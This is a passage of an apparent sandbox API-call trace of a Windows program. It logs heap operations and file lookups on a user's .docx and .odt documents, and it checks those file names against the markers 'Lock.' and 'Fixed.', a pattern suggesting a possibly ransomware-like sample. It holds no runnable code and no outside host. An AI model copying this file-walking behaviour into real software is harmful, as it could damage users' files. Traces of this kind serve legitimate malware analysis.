hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0262.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/dKfh5A-JQm_Dx.docx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKfh5A-JQm_Dx.docx", lpFilePart=0x8bf658*="dKfh5A-JQm_Dx.docx") returned 0x3a [0262.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0262.131] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKfh5A-JQm_Dx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkfh5a-jqm_dx.docx")) returned 0xffffffff [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0262.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EJnozy8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jnozy8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nozy8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozy8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zy8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wA_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.134] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EJnozy8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jnozy8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nozy8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozy8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zy8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wA_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6u.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.135] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0262.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0262.135] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0262.136] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.136] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0262.136] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.137] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0262.137] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.137] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.137] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.137] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.137] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/EJnozy8q_wA_6u.odt", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f5500, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0x4d68c6d0, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x4d68c6d0, ftLastWriteTime.dwHighDateTime=0x1d4d4ad, nFileSizeHigh=0x0, nFileSizeLow=0x8e1e, dwReserved0=0xa7c0047, dwReserved1=0x23a24, cFileName="EJnozy8q_wA_6u.odt", cAlternateFileName="EJNOZY~1.ODT")) returned 0xaa59a0 [0262.137] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.138] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0262.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.141] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.141] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0262.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.141] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.142] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.143] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.143] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.143] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.143] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.144] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.145] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: 